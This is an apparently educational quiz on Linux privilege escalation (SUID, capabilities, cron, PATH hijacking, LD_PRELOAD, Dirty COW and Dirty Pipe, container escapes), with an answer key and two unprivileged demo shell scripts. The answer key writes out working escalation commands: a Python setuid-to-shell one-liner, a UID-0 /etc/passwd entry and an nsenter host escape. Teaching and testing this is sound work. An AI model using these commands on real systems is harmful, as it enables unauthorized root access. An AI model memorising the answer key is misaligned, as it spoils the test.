Chapter 15 Quiz: Linux Exploitation and Privilege Escalation
Test your understanding of Linux privilege escalation techniques, tools, and defensive measures.
1. When a binary has the SUID bit set and is owned by root, what happens when a regular user executes it?
A) The binary runs with the permissions of the user who executed it
B) The binary runs with root permissions regardless of who executed it
C) The binary prompts for the root password before execution
D) The binary runs in a sandbox with restricted permissions
2. You discover a SUID binary at /usr/local/bin/backup-tool. Running strings on it reveals it calls tar without an absolute path. What attack technique is applicable?
A) Buffer overflow exploitation
B) PATH hijacking
C) Kernel exploitation
D) LD_PRELOAD injection
3. Which Linux capability, if assigned to a Python binary, allows direct privilege escalation to root?
A) cap_net_raw
B) cap_net_bind_service
C) cap_setuid
D) cap_sys_time
4. What is the primary purpose of the pspy tool in privilege escalation enumeration?
A) Scanning for kernel vulnerabilities
B) Monitoring processes without root privileges to discover hidden cron jobs
C) Brute-forcing SSH credentials
D) Exploiting SUID binaries
5. In the context of Dirty COW (CVE-2016-5195), what type of vulnerability is being exploited?
A) Buffer overflow in a SUID binary
B) Race condition in the kernel's copy-on-write mechanism
C) SQL injection in a web application running as root
D) Misconfigured sudo permissions
6. A cron job runs * * * * * root /opt/scripts/cleanup.sh and the script is world-writable. What is the most straightforward exploitation method?
A) Modify the cron schedule to run more frequently
B) Append a reverse shell command to the script
C) Replace the cron daemon with a malicious version
D) Exploit the cron service itself
7. What does the following command search for?
find / -perm -4000 -type f 2>/dev/null
A) Files modified in the last 4000 seconds
B) Files larger than 4000 bytes
C) Files with the SUID bit set
D) Files owned by UID 4000
8. You find that /etc/passwd is writable by your user. What is the fastest path to root?
A) Delete the root account entry
B) Add a new user with UID 0 and a known password hash
C) Change the root user's shell to /bin/false
D) Modify the permissions of /etc/shadow through /etc/passwd
9. Which of the following indicates you are running inside a Docker container?
A) The file /etc/docker.conf exists
B) The file /.dockerenv exists
C) The kernel version contains "docker"
D) The hostname is always "docker-host"
10. What is the critical difference between a privileged Docker container and a standard container from a security perspective?
A) Privileged containers have network access; standard containers do not
B) Privileged containers have all Linux capabilities and can access host devices
C) Privileged containers can only run as the root user
D) Privileged containers use a different Linux kernel
11. In LinPEAS output, what does a "Red/Yellow (95% PE vector)" color coding indicate?
A) The finding is informational and requires no action
B) The finding is almost certainly a privilege escalation path
C) The finding relates to network configuration
D) The finding is a false positive
12. A custom SUID binary calls system("service apache2 status"). The service command is called without its absolute path. To exploit this via PATH hijacking, you would:
A) Modify the real service binary at /usr/sbin/service
B) Create a malicious service script in a directory that appears earlier in the PATH
C) Recompile the SUID binary with a different command
D) Change the Apache configuration to escalate privileges
13. What security mechanism in Linux provides Mandatory Access Control that can restrict processes even when running as root?
A) Standard file permissions (rwx)
B) SUID/SGID bits
C) SELinux or AppArmor
D) The sudo mechanism
14. You have found that LD_PRELOAD is preserved in the sudoers configuration (Defaults env_keep += "LD_PRELOAD"). How can this be exploited?
A) Use LD_PRELOAD to load a malicious shared library when executing any allowed sudo command
B) Modify the LD_PRELOAD variable to point to the kernel
C) Use LD_PRELOAD to bypass SELinux policies
D) LD_PRELOAD only works with interpreted languages, not compiled binaries
15. Which of the following is the recommended order for attempting privilege escalation vectors (from safest to riskiest)?
A) Kernel exploits -> SUID binaries -> Cron jobs -> Sudo misconfigs
B) Sudo misconfigs -> SUID/capabilities -> Cron/PATH hijacking -> Kernel exploits
C) Container escapes -> Kernel exploits -> Network attacks -> Social engineering
D) Automated tools -> Manual enumeration -> Kernel exploits -> Physical access
16. The Dirty Pipe vulnerability (CVE-2022-0847) allows an attacker to:
A) Escalate privileges through a buffer overflow in the SSH daemon
B) Overwrite data in read-only files by exploiting the pipe mechanism
C) Inject code into running Docker containers
D) Bypass firewall rules through raw socket manipulation
17. Which tool provides a curated database of Unix binaries that can be exploited for privilege escalation when they have SUID or sudo access?
A) Metasploit
B) Nmap
C) GTFOBins
D) Burp Suite
18. In a Kubernetes pod, what must you typically use to escape to the host if the pod has hostPID: true?
A) Docker socket access
B) nsenter targeting PID 1 to enter the host's namespace
C) Mounting the host filesystem via NFS
D) Exploiting the Kubernetes API
Answer Key
1. B - SUID makes the binary run with the effective UID of its owner (root here) while the real UID stays that of the caller. Caveat: bash drops the elevated effective UID at startup unless started with -p, which is why payloads usually call setuid(0) first or spawn the shell with -p.
2. B - PATH hijacking. An unqualified call such as system("tar ...") resolves tar through the caller-controlled PATH, so an attacker places a malicious tar in a directory that is searched first and runs the SUID binary.
3. C - cap_setuid lets the process change its UID. On a Python interpreter: python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'. Enumerate with getcap -r / 2>/dev/null.
4. B - pspy polls /proc for process creation and surfaces cron jobs and other scheduled tasks in real time without root.
5. B - Dirty COW (CVE-2016-5195) is a race condition in the kernel's copy-on-write handling that lets writes to a private mapping land in a file the user can only read.
6. B - Appending a payload (for example a reverse shell) to the world-writable script is the direct path; with the * * * * * schedule it runs as root within a minute.
7. C - -perm -4000 matches files with the SUID bit (octal 4000) set; -type f restricts the match to regular files and 2>/dev/null discards permission-denied errors.
8. B - Append a line such as newroot:<hash>:0:0:root:/root:/bin/bash with a hash you generated yourself (e.g. with openssl passwd), then su newroot. A hash placed directly in /etc/passwd takes precedence over /etc/shadow for that entry.
9. B - Docker creates /.dockerenv in the container's root filesystem, making it a standard (though not infallible) indicator; cross-check with /proc/1/cgroup.
10. B - --privileged grants every capability, disables the default seccomp and AppArmor confinement, and exposes host devices, so mounting the host disk from inside the container is trivial.
11. B - LinPEAS prints RED/YELLOW for findings it rates as 95% likely privilege escalation vectors.
12. B - Create an executable named service in a directory you control that appears in PATH before /usr/sbin (or prepend such a directory), then run the SUID binary. This only works if the binary inherits your PATH instead of resetting it before the call.
13. C - SELinux and AppArmor implement mandatory access control; their policy is enforced even on processes running as UID 0.
14. A - Because sudo keeps LD_PRELOAD, the named shared library is loaded into the process sudo spawns as root; a constructor in that library can setuid(0) and exec a shell. You still need sudo rights to at least one command.
15. B - Work from stable misconfigurations (sudo, SUID/capabilities, cron/PATH) toward kernel exploits, which are tried last because they can crash the host.
16. B - Dirty Pipe (CVE-2022-0847) is a flaw in pipe buffer flag handling after splice() that lets an unprivileged user overwrite data in the page cache of files they can only read, such as /etc/passwd.
17. C - GTFOBins is the reference for Unix binaries that can be abused under SUID, sudo, or capabilities.
18. B - With hostPID the pod sees the host's PID 1, so nsenter --target 1 --mount --uts --ipc --net --pid bash joins the host's namespaces. setns() also requires CAP_SYS_ADMIN in the pod (typically privileged: true), so hostPID alone is not enough.
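The PATH hijacking technique behind questions 2 and 12, as an added runnable example that is not part of the quiz. The "SUID binary" is a stand-in shell script (not setuid) that calls tar by bare name, so the demo runs unprivileged; the directory names under the temp dir and the fake tar's payload are assumptions of this example.

```shell
#!/bin/sh
# Added example: simulate PATH hijacking of an unqualified command call.
# The victim is a stand-in for /usr/local/bin/backup-tool; it is NOT setuid,
# so everything runs as the invoking user.

set -eu

WORK="$(mktemp -d)"
trap 'rm -rf "$WORK"' EXIT

# Vulnerable program: relies on PATH lookup for tar (stand-in for system("tar ...")).
make_victim() {
    mkdir -p "$WORK/victim"
    cat > "$WORK/victim/backup-tool" <<'EOF'
#!/bin/sh
tar --version | head -n 1
EOF
    chmod 755 "$WORK/victim/backup-tool"
}

# Attacker-controlled directory that will be prepended to PATH, holding a fake tar.
make_payload() {
    mkdir -p "$WORK/hijack"
    cat > "$WORK/hijack/tar" <<'EOF'
#!/bin/sh
# A real payload would copy /bin/sh somewhere and chmod 4755 it while root.
echo "HIJACKED: fake tar ran as uid $(id -u)"
EOF
    chmod 755 "$WORK/hijack/tar"
}

# Enumeration step from Q2: does the file reference tar without a leading slash?
calls_unqualified_tar() {
    grep -Eq '(^|[^/[:alnum:]_])tar[[:space:]]' "$1"
}

# Run the victim with the attacker directory first in PATH; print its output.
run_hijack() {
    PATH="$WORK/hijack:$PATH" "$WORK/victim/backup-tool"
}

# Show what tar resolves to under a given PATH (a sanitized PATH defeats the attack).
resolve_tar_with() {
    PATH="$1" command -v tar || echo "not found"
}

make_victim
make_payload
```

The fix on the defender's side is either an absolute path in the call or resetting PATH to a fixed value before system() runs; resolve_tar_with lets you see what a given PATH would pick.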
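The SUID enumeration from question 7 combined with the GTFOBins-style triage of question 17, as an added example that is not part of the quiz. It wraps the quiz's find command so it can be pointed at any directory and flags SUID files whose names are on a short watchlist; the watchlist is a hand-picked assumption here (GTFOBins is the authoritative source), and the fixture directory is constructed for the demo.

```shell
#!/bin/sh
# Added example: SUID enumeration plus name-based triage.
# Setting u+s on files you own needs no root, so the fixture runs unprivileged.

set -eu

# Sample of names GTFOBins documents SUID techniques for (assumption, not exhaustive).
WATCHLIST="bash sh find vim nmap python python3 perl cp mv env less more tar"

# Regular files with the SUID bit under $1 (default /), exactly like the quiz command.
find_suid() {
    find "${1:-/}" -perm -4000 -type f 2>/dev/null | sort
}

# Return 0 if the basename of $1 is on the watchlist.
is_watchlisted() {
    name="$(basename "$1")"
    for w in $WATCHLIST; do
        [ "$name" = "$w" ] && return 0
    done
    return 1
}

# Print "HIGH <path>" for watchlisted SUID files and "INFO <path>" for the rest.
triage_suid() {
    find_suid "${1:-/}" | while IFS= read -r f; do
        if is_watchlisted "$f"; then
            echo "HIGH $f"
        else
            echo "INFO $f"
        fi
    done
}

# Constructed fixture: two SUID files (one watchlisted) and one non-SUID file.
# On a nosuid mount the bit is still stored, so find reports it either way.
make_fixture() {
    d="$(mktemp -d)"
    mkdir -p "$d/bin"
    : > "$d/bin/find";  chmod 4755 "$d/bin/find"
    : > "$d/bin/myapp"; chmod 4755 "$d/bin/myapp"
    : > "$d/bin/cat";   chmod 0755 "$d/bin/cat"
    echo "$d"
}
```

Run triage_suid / on a real host; HIGH lines are candidates to look up on GTFOBins, while INFO lines such as custom binaries are the ones worth pulling strings on for unqualified command calls.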